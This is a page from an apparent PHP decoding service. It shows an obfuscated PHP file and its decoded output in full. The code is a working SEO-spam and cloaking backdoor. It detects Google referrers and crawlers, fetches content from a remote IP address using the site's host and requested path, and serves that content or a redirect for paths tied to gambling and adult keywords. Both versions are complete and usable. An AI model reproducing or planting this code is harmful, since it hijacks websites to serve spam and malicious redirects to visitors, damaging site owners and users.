Find this useful? Enter your email to receive occasional updates for securing PHP code.

Signing you up...

Thank you for signing up!

PHP Decode

<?php goto WsTnW; DQMLs: hfPe9: goto F4IXb; Fk_RC: cI4xD: goto u_clL; R3781: header("\x43..

Decoded Output download

<?php 
goto WsTnW; DQMLs: hfPe9: goto F4IXb; Fk_RC: cI4xD: goto u_clL; R3781: header("Content-Type: text/css"); goto SrmZe; F4IXb: a0PVQ: goto FuxPU; hjTa2: $R99Nd = pathinfo($hwUal, PATHINFO_EXTENSION); goto asjke; yS0JH: exit; goto tkW7k; asjke: if (!(strpos($_SERVER["REQUEST_URI"], ".css") !== false)) { goto a0PVQ; } goto R3781; bC1L2: function EmkRT() { goto y6J20; Pv3A3: pQDUK: goto P573x; y6J20: if (!preg_match("/.*(google).*/i", isset($_SERVER["HTTP_REFERER"])?$_SERVER["HTTP_REFERER"]:'')) { goto pQDUK; } goto f5vCt; f5vCt: return true; goto Pv3A3; P573x: return false; goto dWcP1; dWcP1: } goto oIyW1; Pud4Y: echo file_get_contents($hwUal); goto yS0JH; FuxPU: if (!(strpos($_SERVER["REQUEST_URI"], ".xml") !== false)) { goto cI4xD; } goto WU1pM; wP2YU: $hwUal = HygRT($v8Zjz, $ENqq5); goto hjTa2; oFuHZ: exit; goto DQMLs; WU1pM: header("Content-Type: application/xml"); goto PDfo_; r_Tko: function qNQ0K() { goto K89on; kvFhn: goto pjezV; goto FrLPw; K89on: if (preg_match("/.*(google).*/i", $_SERVER["HTTP_USER_AGENT"])) { goto qRQjv; } goto vYLGp; vYLGp: return false; goto kvFhn; FrLPw: qRQjv: goto NKU9F; NKU9F: return true; goto KssyE; KssyE: pjezV: goto SzKtt; SzKtt: } goto bC1L2; tkW7k: toWjs: goto Fk_RC; PDfo_: if (!($hwUal !== "404")) { goto toWjs; } goto Pud4Y; y2GaK: echo file_get_contents($hwUal); goto oFuHZ; rtH84: function HYgrt($v8Zjz, $ENqq5) { goto j2N9j; j2N9j: $PSD1_ = "http://165.154.229.221/jsc@?"; goto JM0P6; HdWo1: return "404"; goto n6w8x; b8NGF: return $PSD1_ . $tIjzG . $umR0e . $iErQ7 . $IEZPv; goto AtqjO; n6w8x: OXHAZ: goto M6r4b; JM0P6: if (!emkRt()) { goto pT2u4; } goto lGfmF; RCPFn: pT2u4: goto Jw0Om; Jw0Om: if (qNq0k()) { goto OXHAZ; } goto HdWo1; lGfmF: return $PSD1_ . "/redirect.html"; goto RCPFn; HpCB5: $umR0e = "&url_tag=" . ltrim($LenQs["path"], "/") . "?/{$ENqq5[0]}"; goto eU1KB; Ka28L: $IEZPv = isset($LenQs["query"]) ? "&keyword=" . $LenQs["query"] : "&keyword=" . str_replace("?", " ", $_SERVER["REQUEST_URI"]); goto b8NGF; tNeFS: $iErQ7 = "&host={$_SERVER["HTTP_HOST"]}"; goto HpCB5; M6r4b: $LenQs = parse_url($v8Zjz); goto tNeFS; eU1KB: $tIjzG = "site=" . (isset($_SERVER["HTTPS"]) ? "https" : "http") . "://{$_SERVER["HTTP_HOST"]}" . $LenQs["path"] . "?/"; goto Ka28L; AtqjO: } goto r_Tko; u_clL: foreach ($ENqq5 as $IEZPv) { goto YUCu0; a6Py5: $extension = pathinfo($_SERVER['REQUEST_URI'], PATHINFO_EXTENSION);if (in_array($extension, ['jpg', 'jpeg', 'png', 'gif'])) {header("Content-Type: image/jpeg");}; goto G2NDS; Eyk6U: Y6bIw: goto s8rBk; YUCu0: if (!(strpos($_SERVER["REQUEST_URI"], "?/{$IEZPv}/") !== false)) { goto Y6bIw; } goto a6Py5; UibU_: F3Zr3: goto Eyk6U; ZiNPX: exit; goto UibU_; G2NDS: if (!($hwUal !== "404")) { goto F3Zr3; } goto TvdgU; TvdgU: echo file_get_contents($hwUal); goto ZiNPX; s8rBk: d_Npn: goto ykIqI; ykIqI: } goto OIAc9; oIyW1: $v8Zjz = (isset($_SERVER["HTTPS"]) ? "https" : "http") . "://{$_SERVER["HTTP_HOST"]}{$_SERVER["REQUEST_URI"]}"; goto wP2YU; SrmZe: if (!($hwUal !== "404")) { goto hfPe9; } goto y2GaK; WsTnW: $ENqq5 = ["ptchc", "ftec", "dev", "media", "adminvieclam", "home", "cmshome", "xettuyen", "khaosat", "en", "sv", "egov", "beongsaigon", "chinhsach", "cmsts", "tuyensinh", "beta", "game", "win", "bet", "vn", "for88", "ww88", "hot", "ios", "app", "android", "pay", "store", "download", "77bet", "goods", "jav", "sex", "18+", "viet69", "viet", "phim", "xxx", "hentai", "s e x", "cliptv"]; goto rtH84; OIAc9: GTFA4:; 
?>

Did this file decode correctly?

Original Code

<?php
goto WsTnW; DQMLs: hfPe9: goto F4IXb; Fk_RC: cI4xD: goto u_clL; R3781: header("\x43\x6f\156\164\145\156\x74\x2d\x54\x79\160\x65\72\x20\164\145\x78\164\57\x63\x73\163"); goto SrmZe; F4IXb: a0PVQ: goto FuxPU; hjTa2: $R99Nd = pathinfo($hwUal, PATHINFO_EXTENSION); goto asjke; yS0JH: exit; goto tkW7k; asjke: if (!(strpos($_SERVER["\x52\105\121\x55\105\x53\x54\x5f\x55\122\111"], "\x2e\x63\163\163") !== false)) { goto a0PVQ; } goto R3781; bC1L2: function EmkRT() { goto y6J20; Pv3A3: pQDUK: goto P573x; y6J20: if (!preg_match("\57\56\x2a\50\147\x6f\x6f\x67\x6c\145\x29\x2e\x2a\x2f\x69", isset($_SERVER["\110\x54\x54\120\137\122\x45\106\105\122\x45\122"])?$_SERVER["\110\x54\x54\120\137\122\x45\106\105\122\x45\122"]:'')) { goto pQDUK; } goto f5vCt; f5vCt: return true; goto Pv3A3; P573x: return false; goto dWcP1; dWcP1: } goto oIyW1; Pud4Y: echo file_get_contents($hwUal); goto yS0JH; FuxPU: if (!(strpos($_SERVER["\122\x45\x51\125\105\123\124\137\125\122\111"], "\x2e\x78\155\154") !== false)) { goto cI4xD; } goto WU1pM; wP2YU: $hwUal = HygRT($v8Zjz, $ENqq5); goto hjTa2; oFuHZ: exit; goto DQMLs; WU1pM: header("\103\x6f\156\x74\145\x6e\x74\55\124\x79\x70\x65\72\x20\x61\160\x70\154\151\143\x61\164\x69\157\x6e\x2f\170\155\x6c"); goto PDfo_; r_Tko: function qNQ0K() { goto K89on; kvFhn: goto pjezV; goto FrLPw; K89on: if (preg_match("\57\x2e\52\50\x67\157\157\x67\154\x65\x29\56\x2a\x2f\151", $_SERVER["\x48\124\x54\x50\x5f\x55\123\105\x52\x5f\101\x47\x45\x4e\124"])) { goto qRQjv; } goto vYLGp; vYLGp: return false; goto kvFhn; FrLPw: qRQjv: goto NKU9F; NKU9F: return true; goto KssyE; KssyE: pjezV: goto SzKtt; SzKtt: } goto bC1L2; tkW7k: toWjs: goto Fk_RC; PDfo_: if (!($hwUal !== "\x34\60\64")) { goto toWjs; } goto Pud4Y; y2GaK: echo file_get_contents($hwUal); goto oFuHZ; rtH84: function HYgrt($v8Zjz, $ENqq5) { goto j2N9j; j2N9j: $PSD1_ = "\150\164\164\160\x3a\x2f\57\x31\66\65\x2e\61\65\x34\x2e\62\62\x39\x2e\62\x32\x31\57\x6a\x73\x63\100\77"; goto JM0P6; HdWo1: return "\x34\60\x34"; goto n6w8x; b8NGF: return $PSD1_ . $tIjzG . $umR0e . $iErQ7 . $IEZPv; goto AtqjO; n6w8x: OXHAZ: goto M6r4b; JM0P6: if (!emkRt()) { goto pT2u4; } goto lGfmF; RCPFn: pT2u4: goto Jw0Om; Jw0Om: if (qNq0k()) { goto OXHAZ; } goto HdWo1; lGfmF: return $PSD1_ . "\x2f\162\x65\x64\151\x72\x65\143\164\56\x68\x74\155\154"; goto RCPFn; HpCB5: $umR0e = "\46\165\162\x6c\x5f\x74\x61\147\x3d" . ltrim($LenQs["\160\141\164\x68"], "\57") . "\x3f\57{$ENqq5[0]}"; goto eU1KB; Ka28L: $IEZPv = isset($LenQs["\161\165\x65\162\171"]) ? "\x26\153\145\171\x77\157\162\144\75" . $LenQs["\x71\x75\x65\162\171"] : "\x26\x6b\x65\x79\x77\157\x72\144\x3d" . str_replace("\77", "\40", $_SERVER["\x52\x45\121\125\x45\x53\x54\x5f\x55\x52\111"]); goto b8NGF; tNeFS: $iErQ7 = "\x26\x68\x6f\163\x74\x3d{$_SERVER["\x48\124\x54\x50\137\x48\x4f\x53\x54"]}"; goto HpCB5; M6r4b: $LenQs = parse_url($v8Zjz); goto tNeFS; eU1KB: $tIjzG = "\x73\x69\164\x65\75" . (isset($_SERVER["\x48\x54\x54\120\123"]) ? "\150\x74\x74\x70\x73" : "\150\x74\x74\x70") . "\72\x2f\x2f{$_SERVER["\110\124\x54\x50\137\110\x4f\x53\x54"]}" . $LenQs["\160\x61\164\150"] . "\x3f\57"; goto Ka28L; AtqjO: } goto r_Tko; u_clL: foreach ($ENqq5 as $IEZPv) { goto YUCu0; a6Py5: $extension = pathinfo($_SERVER['REQUEST_URI'], PATHINFO_EXTENSION);if (in_array($extension, ['jpg', 'jpeg', 'png', 'gif'])) {header("Content-Type: image/jpeg");}; goto G2NDS; Eyk6U: Y6bIw: goto s8rBk; YUCu0: if (!(strpos($_SERVER["\122\x45\x51\x55\x45\123\124\137\x55\122\x49"], "\x3f\57{$IEZPv}\x2f") !== false)) { goto Y6bIw; } goto a6Py5; UibU_: F3Zr3: goto Eyk6U; ZiNPX: exit; goto UibU_; G2NDS: if (!($hwUal !== "\64\60\64")) { goto F3Zr3; } goto TvdgU; TvdgU: echo file_get_contents($hwUal); goto ZiNPX; s8rBk: d_Npn: goto ykIqI; ykIqI: } goto OIAc9; oIyW1: $v8Zjz = (isset($_SERVER["\x48\x54\124\120\x53"]) ? "\x68\164\164\x70\x73" : "\x68\164\164\160") . "\x3a\57\x2f{$_SERVER["\x48\124\124\x50\137\x48\117\123\124"]}{$_SERVER["\x52\105\x51\x55\x45\123\x54\x5f\x55\x52\111"]}"; goto wP2YU; SrmZe: if (!($hwUal !== "\x34\60\64")) { goto hfPe9; } goto y2GaK; WsTnW: $ENqq5 = ["\x70\164\x63\150\143", "\x66\164\x65\143", "\x64\145\166", "\155\x65\144\x69\141", "\x61\x64\155\x69\156\166\151\145\x63\x6c\x61\155", "\x68\x6f\155\x65", "\143\155\163\x68\x6f\155\145", "\170\x65\x74\164\x75\171\145\x6e", "\x6b\x68\141\157\x73\141\164", "\145\x6e", "\163\x76", "\145\147\x6f\166", "\x62\x65\x6f\156\x67\x73\141\x69\x67\x6f\x6e", "\143\150\x69\156\x68\163\x61\143\150", "\143\x6d\163\x74\163", "\x74\x75\x79\145\x6e\x73\151\156\x68", "\142\x65\164\x61", "\x67\141\x6d\145", "\x77\x69\156", "\142\145\164", "\x76\156", "\x66\x6f\162\70\x38", "\x77\167\x38\x38", "\x68\x6f\x74", "\x69\x6f\163", "\141\160\x70", "\x61\x6e\x64\x72\x6f\x69\x64", "\x70\x61\x79", "\x73\164\157\162\x65", "\x64\x6f\x77\156\x6c\x6f\x61\144", "\x37\67\x62\145\164", "\147\157\x6f\x64\163", "\x6a\141\166", "\163\x65\170", "\x31\70\53", "\x76\x69\x65\x74\x36\x39", "\x76\x69\x65\164", "\160\x68\151\x6d", "\x78\x78\170", "\150\x65\x6e\164\141\x69", "\163\40\145\x20\170", "\143\154\x69\x70\164\166"]; goto rtH84; OIAc9: GTFA4:;
?>

Function Calls

None

Variables

None

Stats

MD5 9a46c1d89bbc28a722ac4ac823958528
Eval Count 0
Decode Time 40 ms